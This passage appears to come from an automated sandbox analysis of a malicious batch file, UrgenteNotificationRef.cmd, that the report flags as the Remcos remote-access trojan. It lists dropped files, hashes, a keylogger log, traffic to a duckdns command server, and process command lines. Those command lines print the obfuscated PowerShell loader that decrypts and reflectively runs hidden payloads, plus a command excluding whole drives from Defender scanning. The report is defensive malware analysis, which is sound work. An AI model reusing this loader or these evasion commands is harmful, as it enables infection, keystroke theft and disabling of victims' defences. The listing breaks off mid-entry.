                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzovngix.50i.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrfeu22c.zls.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytjbolok.r05.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Network28681Man.cmd

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):602682
                                    Entropy (8bit):6.0096586276122155
                                    Encrypted:false
                                    SSDEEP:12288:q9cYSg8iNuajntoHRPGclDWZMF+BY/TPwcoYIRYhslB06IPaUTj:EcYSg/ucntoHRP5yZjQTHTIjJq
                                    MD5:F01B6515E2BA3FEB16FD0AEE360DD548
                                    SHA1:B4B9E3CED7F77F3F0EC4434C22AC17C8E0449A4D
                                    SHA-256:0AA7625B469A7A8D9AB9F6FDD8A17050F7774AAECED7BA3E4D93FBB4C63E2BD7
                                    SHA-512:8EC5F8EC0D4833ADB0069E6D7766BC01807F0D2C0EDCD3AD4E548C9F558B34051E4F06487D061EF400896AEB8E397C633F4A7E6CE2EEFA1F1C8C9C26BE618C81
                                    Malicious:true
                                    Preview:@echo off..set "dmaPVT=sTYzMJet TYzMJHkTYzMJcbTYzMJ=1TYzMJ TYzMJ&&TYzMJ sTYzMJtTYzMJarTYzMJt "TYzMJ" TYzMJ/mTYzMJiTYzMJn TYzMJ"..set "BLifnJ=&& TYzMJexTYzMJitTYzMJ"..set "pbKzuk=nTYzMJoTYzMJt dTYzMJefiTYzMJneTYzMJdTYzMJ TYzMJHkTYzMJcTYzMJbTYzMJ..if %pbKzuk:TYzMJ=% (%dmaPVT:TYzMJ=%%0 %BLifnJ:TYzMJ=%)..::lSN+HvB22bH3Um6LuVYQc2aq4ZwmHJ+LnXy5C35MTLt/yfIhocc96PDs+5DNLppAsxorO/K2H4oasl50tWjFX0z1SnCfCvPXiEdh4KtK7Zjq6CGWZ26pKAz1KZBN7DXoavVW15i8SABZwgbhKprXD4XdaOCEnEwXV0XP4wyxtZYT9+k65aRiRd5C6TkkisWYng2Zo4C1v33zR2bLc63YFsjuUqmDuNp2V3GjMtm3EE7CAzziJcvESHMPcIAMtQQtZqGfHI0feciTpeBvkhE6YlU8P6br7RsfD04FG7aIbwAaAylUuj6eD0/LedoCdf01YSwhtGXKEY5zQ3cYPPPoI9mTgyaV2yZDqYZaMzZYgtYtNVPoruRxs8QQ5HvuZBZG18julQEeHJSzp0lIET36qS8e3pzGIbaHlCzEMSxW37v0e8JNi9SEbgPV+ogMXICAiuSTwEG6003A8B26q2HzRDLp1U5yY8/1ZJypZ0cZquWLG02ciobzkgJirsnA3K10q2tUwCHWzg6PhqKRtZ928GgAg2D6Lz3auQx9A1sBDlTBrC1++PKNHGRGwu+G3uE8KUuXg+BchqqavQpE3HCsQN7nF19h8Pu6RDLMSRo4F04bsPQyXaW7EfvWGijMHQR/4SjJ6xci4kk8zC9mgACzzdPwPSvltv2BVTkB+JBPqNquliaL6B4Wkoh3

                                    C:\Users\user\AppData\Roaming\brotha\logs.dat

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):184
                                    Entropy (8bit):3.33092697063805
                                    Encrypted:false
                                    SSDEEP:3:rhlKl+hNAAfcfcl5JWRal2Jl+7R0DAlBG4phlKl+hNAAfvdlAblovDl6v:6l+8OcfU5YcIeeDAlMl+8OvAbWAv
                                    MD5:1AA568DEA27D823685D2083F40D9B4F8
                                    SHA1:37F3C896835F14550BA2C3D5B65DBFDD7C4148E5
                                    SHA-256:5A87391E52D9B376E73C2B47386BF88C8F956136F3E6AC13715AFDCE440A3633
                                    SHA-512:AFC8EE22B51CB3326561A56CF2856348914DF39D524F98AF528F76BD001211BDFA0DE72688B9F48FA85EFB3F923106AFF6DE620C8568C9DE9CEC1164E4020CD8
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\brotha\logs.dat, Author: Joe Security
                                    Preview:....[.2.0.2.4./.0.4./.2.4. .1.4.:.1.6.:.3.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.4. .1.4.:.1.6.:.3.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (2142), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):2144
                                    Entropy (8bit):5.802308578902304
                                    Encrypted:false
                                    SSDEEP:48:sJ5L8jdlk35nKmyjaJmRPRrRxzBnBpSdkrkp4A6xMbJNOt1Wk:2LE3GKDYmxp7zBnBpSoA6xMlNOp
                                    MD5:310FBDD58705C8B0F94B59FDCA73D446
                                    SHA1:3A662D048364CB2C1EE372FC2D7CA60D176EA28D
                                    SHA-256:B017F6D52AAB0EFF266C3F9B351C148CF9662B431CC724A20EE2FF667FFEC50D
                                    SHA-512:8035DCBB605D4488958890EBF9FE28FF9F38D143E4F2694C44DF6209F078597BE5ED0FBCB2CB05E2527CA4C6E8A85EF9501DCB037C40F423050C2DB3C4BE82B6
                                    Malicious:false
                                    Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Secur

                                    Static File Info

                                    General

                                    File type:DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
                                    Entropy (8bit):6.0096586276122155
                                    TrID:
                                      File name:UrgenteNotificationRef.cmd
                                      File size:602'682 bytes
                                      MD5:f01b6515e2ba3feb16fd0aee360dd548
                                      SHA1:b4b9e3ced7f77f3f0ec4434c22ac17c8e0449a4d
                                      SHA256:0aa7625b469a7a8d9ab9f6fdd8a17050f7774aaeced7ba3e4d93fbb4c63e2bd7
                                      SHA512:8ec5f8ec0d4833adb0069e6d7766bc01807f0d2c0edcd3ad4e548c9f558b34051e4f06487d061ef400896aeb8e397c633f4a7e6ce2eefa1f1c8c9c26be618c81
                                      SSDEEP:12288:q9cYSg8iNuajntoHRPGclDWZMF+BY/TPwcoYIRYhslB06IPaUTj:EcYSg/ucntoHRP5yZjQTHTIjJq
                                      TLSH:F8D42311D88E2F465BF4DA2A57AF21AB454027B1275CEFF22174604323796835A2FE3F
                                      File Content Preview:@echo off..set "dmaPVT=sTYzMJet TYzMJHkTYzMJcbTYzMJ=1TYzMJ TYzMJ&&TYzMJ sTYzMJtTYzMJarTYzMJt "TYzMJ" TYzMJ/mTYzMJiTYzMJn TYzMJ"..set "BLifnJ=&& TYzMJexTYzMJitTYzMJ"..set "pbKzuk=nTYzMJoTYzMJt dTYzMJefiTYzMJneTYzMJdTYzMJ TYzMJHkTYzMJcTYzMJbTYzMJ..if %pbKzu

                                      File Icon

                                      Icon Hash:9686878b929a9886

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 24, 2024 14:11:21.877532959 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:22.398708105 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:22.398794889 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:22.402568102 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:23.000241041 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:23.042306900 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:23.485584974 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:23.490055084 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:24.012130976 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:24.012197971 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:24.557024002 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:24.733156919 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:24.734669924 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:25.314954996 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:25.354916096 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:25.498085022 CEST4973980192.168.2.4178.237.33.50
                                      Apr 24, 2024 14:11:25.797859907 CEST8049739178.237.33.50192.168.2.4
                                      Apr 24, 2024 14:11:25.797936916 CEST4973980192.168.2.4178.237.33.50
                                      Apr 24, 2024 14:11:25.798266888 CEST4973980192.168.2.4178.237.33.50
                                      Apr 24, 2024 14:11:26.104964018 CEST8049739178.237.33.50192.168.2.4
                                      Apr 24, 2024 14:11:26.106025934 CEST4973980192.168.2.4178.237.33.50
                                      Apr 24, 2024 14:11:26.118521929 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:26.676220894 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:27.104300976 CEST8049739178.237.33.50192.168.2.4
                                      Apr 24, 2024 14:11:27.106431961 CEST4973980192.168.2.4178.237.33.50
                                      Apr 24, 2024 14:11:37.671962023 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:11:37.673557043 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:11:38.252758980 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:12:07.776957035 CEST105214973745.74.19.121192.168.2.4
                                      Apr 24, 2024 14:12:07.778776884 CEST4973710521192.168.2.445.74.19.121
                                      Apr 24, 2024 14:12:08.377696037 CEST105214973745.74.19.121192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 24, 2024 14:11:21.642992020 CEST5647453192.168.2.41.1.1.1
                                      Apr 24, 2024 14:11:21.875051022 CEST53564741.1.1.1192.168.2.4
                                      Apr 24, 2024 14:11:25.339945078 CEST5918753192.168.2.41.1.1.1
                                      Apr 24, 2024 14:11:25.493904114 CEST53591871.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Apr 24, 2024 14:11:21.642992020 CEST192.168.2.41.1.1.10x1e42Standard query (0)embargogo237.duckdns.orgA (IP address)IN (0x0001)false
                                      Apr 24, 2024 14:11:25.339945078 CEST192.168.2.41.1.1.10x8a2eStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Apr 24, 2024 14:11:21.875051022 CEST1.1.1.1192.168.2.40x1e42No error (0)embargogo237.duckdns.org45.74.19.121A (IP address)IN (0x0001)false
                                      Apr 24, 2024 14:11:25.493904114 CEST1.1.1.1192.168.2.40x8a2eNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • geoplugin.net

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449739178.237.33.50807612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Apr 24, 2024 14:11:25.798266888 CEST71OUTGET /json.gp HTTP/1.1
                                      Host: geoplugin.net
                                      Cache-Control: no-cache
                                      Apr 24, 2024 14:11:26.104964018 CEST1173INHTTP/1.1 200 OK
                                      date: Wed, 24 Apr 2024 12:11:25 GMT
                                      server: Apache
                                      content-length: 965
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                      Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" "
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:14:10:26
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:14:10:27
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:14:10:29
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:14:10:29
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
